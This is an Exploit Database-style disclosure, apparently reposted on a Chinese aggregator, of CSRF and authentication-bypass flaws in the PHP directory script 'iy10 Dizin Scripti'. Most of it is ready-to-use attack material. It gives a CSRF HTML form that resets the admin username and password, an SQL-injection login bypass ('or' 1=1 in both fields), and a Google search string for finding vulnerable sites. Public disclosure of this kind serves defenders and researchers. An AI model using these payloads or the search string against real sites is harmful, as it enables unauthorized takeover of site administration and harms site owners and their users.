iy10 Dizin Scripti – Multiple Vulnerabilities

• Exploit Database
• 37 阅读

• 作者： KnocKout
  日期： 2015-12-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38927/

• .______________
  ||__/||_____\ _\_______ ____ 
  ||\/ ||\\///_\\___ \_/ __ \
  | Y\/^ /><\\_/ \| \/\___/
  |___|/\____ |/__/\_ \\_____/__|\___>
   \/|__|\/\/\/
   _____________________________ 
  / _____/\_ _____/\_ ___ \
  \_____\|__)_ /\\/ 
  /\ |\\ \____ 
   /_______//_______/ \______/
   \/ \/ \/ 
  iy10 Dizin Scripti => Multiple Vulnerabilities (CSRF & Authentication Bypass)
  ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  [+] Author : KnocKout
  [~] Contact : knockout@e-mail.com.tr
  [~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com 
  [~] Åžeker Insanlar :ZoRLu, ( milw00rm.com ), 
  Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon
  					KedAns-Dz, b3mb4m
  ###########################################################
  ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  |~Web App. : iy10 Dizin Scripti
  |~Affected Version : All Version 
  |~Software: http://wmscripti.com/php-scriptler/iy10-dizin-scripti.html
  |~RISK : High
  |~Google Keyword :"Sitenizi dizine eklemek için tıklayın !"
  
  ################## ++ CSRF Admin Password Change Exploit ++ ######################################
  
  <html>
  <body>
  <form action="http://[TARGET]/admin/kullaniciayarlar.php" method="POST">
  <input type="hidden" name="kullaniciadi" value="knockout" />
  <input type="hidden" name="sifre" value="password" />
  <input type="hidden" name="Submit" value="Exploit!" />
  	<input type="submit" value="Submit request" />
  </form>
  </body>
  </html>
  
  ################# ++ SQL Injection with Authentication Bypass ++###########################################
  
  http://[TARGET]/admin 
  ID: 'or' 1=1
  PW : 'or' 1=1
  
  ############################################################